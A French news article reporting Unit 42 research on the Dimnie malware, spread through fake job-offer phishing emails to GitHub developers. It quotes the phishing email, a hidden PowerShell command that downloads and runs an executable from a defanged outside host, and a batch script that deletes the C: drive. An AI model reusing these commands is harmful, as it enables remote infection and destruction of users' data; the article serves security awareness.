Les développeurs ayant des projets hébergés sur GitHub sont ciblés dans une campagne de phishing
qui vise à installer un malware sur leurs machines

Les développeurs qui sont présents sur la plateforme GitHub et qui y ont un dépôt seraient la cible d’un malware baptisé Dimnie. L’annonce a été faite par les chercheurs en sécurité de l’Unité 42 de Palo Alto Networks. Cette dernière est une entreprise américaine qui construit du matériel de télécommunications. Elle est spécialisée dans les solutions de sécurité pour les réseaux et les ordinateurs.

Dans leur annonce, l’équipe des chercheurs affirme avoir pris connaissance, à la mi-janvier 2017, de plusieurs rapports émis par les développeurs open source. À en croire les explications, les développeurs propriétaires de dépôts GitHub reçoivent une multitude de courriels frauduleux via la technique de phishing. Les courriels identifiés par les chercheurs se présentent généralement comme suit :

Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
Hello,
My name is Adam Buchbinder, I saw your GitHub repo and i'm pretty amazed. 
The point is that i have an open position in my company and looks like you
are a good fit. 
Please take a look into attachment to find details about company and job.
Dont hesitate to contact me directly via email highlighted in the document below. 
Thanks and regards,
Adam.
« Le phishing ou hameçonnage consiste pour le fraudeur à se faire passer pour un organisme qui vous est familier (banque, administration fiscale, caisse de sécurité sociale…), en utilisant son logo et son nom. Vous recevez un courriel dans lequel il vous est demandé de "mettre à jour" ou de "confirmer suite à un incident technique" vos données, notamment bancaires », d’après la Commission nationale de l'informatique et des libertés (CNIL).

Les experts en sécurité de l’Unité 42 soulignent qu’il y a eu plusieurs vagues de campagne de phishing, cependant tous les mails qu’ils ont eus à exploiter sont accompagnés d’un même fichier en pièce jointe portant l’extension .doc (SHA256 : 6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e). Ce dernier, selon les chercheurs, contient du code arbitraire qui permet d’exécuter une commande PowerShell qui est souvent utilisée pour télécharger et exécuter un fichier. Le code arbitraire en question se présente comme suit :

Code powershell : Sélectionner tout - Visualiser dans une fenêtre à part
cmd.exe /c "powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('hxxp://nicklovegrove.co[.]uk/wp-content/margin2601_onechat_word.exe','%appdata%.exe');start-process '%appdata%.exe'"

L'équipe de Palo Alto Networks affirme que différentes versions du malware utilisant les mêmes procédés de commande et de contrôle ont été identifiées depuis l'année 2014, soit il y a quatre ans déjà. La force de ce malware en l'occurrence Dimnie repose sur sa capacité à masquer ses traces de sorte que les outils d'analyse de trafic ne puissent pas le détecter, cela en ayant recours à plusieurs techniques très évoluées. Pour ce faire, le malware Dimnie va par exemple créer une requête proxy HTTP vers un service Google qui n'existe plus en réalité.

Nom : Dimme_5.png
Affichages : 4091
Taille : 212,9 Ko

Cette requête, d'après les chercheurs, permet de cacher une connexion vers un serveur de contrôle et de commande géré par les attaquants. Il ressort des informations recueillies que le malware utilise de faux en-têtes d'image Jpeg pour masquer ses opérations de vol d’informations. Les informations volées sont chiffrées au niveau de ces faux en-têtes d'image, rendant ainsi leur détection assez difficile. Les chercheurs en sécurité soulignent que l'analyse des cookies montre que via l'activité de Dimnie, les attaquants ont la possibilité d'avoir plusieurs informations sur le système comme cela est présenté ci-après :
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
[netbios name]
WORKGROUP
2
HomeGroupUser$
[Hostname]
[Language]
1
10.0.2.15 (08-00-27-D9-83-51) 'Intel(R) PRO/1000 MT-Desktopadapter' PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18
4
Administrator (0x10203)
[Username] (0x10223)
HomeGroupUser$ (0x10201)
[Hostname] (0x10221)
« Chaque module de Dimnie est injecté dans la mémoire du processus Windows essentiels, ce qui rend un peu plus difficile notre analyse », a déclaré l'équipe des chercheurs de Palo Alto Networks. Pour ces derniers, cela est dû au fait qu'il n'y a aucune écriture sur le disque dur. Les chercheurs en sécurité ajoutent que le caractère modulaire du malware Dimnie offre à ses commanditaires plusieurs options notamment :
  • la possibilité de récupérer les codes d’accès de certains services ;
  • la possibilité de récupérer des captures d’écran ;
  • la capacité à extraire frauduleusement des données ;
  • la possibilité d'accéder à la liste des processus exécutés sur une machine :

    Nom : Sans titre.png
Affichages : 3837
Taille : 74,4 Ko
  • la possibilité d'exécuter un module d'autodestruction pour détruire les environnements infectés :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    @echo off
    Title System need to reboot computer!
    color 0c
    Echo Auto Starting in 5 seconds
    @ping 127.0.0.1 -n 5 -w 1000 > nul
    @ping 127.0.0.1 -n %1% -w 1000 > nul
    cls
    Color 0e
    Echo delete disk C
    del C:\\ /s /q
    @ping 127.0.0.1 -n 3 -w 1000 > nul
    @ping 127.0.0.1 -n %1% -w 1000 > nul
    cls
    color 0c
    Echo Remove directory
    Rd C:\\ /s /q
    @ping 127.0.0.1 -n 3 -w 1000 > nul
    @ping 127.0.0.1 -n %1% -w 1000 > nul
    cls
    Msg * \SYSTEM ERROR!HARDDRIVE IS OUT OF ORDER!\;


Les auteurs du malware Dimnie restent pour le moment inconnus ; cependant certains médias émettent une probable tentative d'espionnage de la part d'autorités gouvernementales. Le malware pourrait également être l’œuvre de cybercriminels.

Source : Unité 42 de Palo Alto Networks

Et vous ?

Que pensez-vous de cette menace sur GitHub ?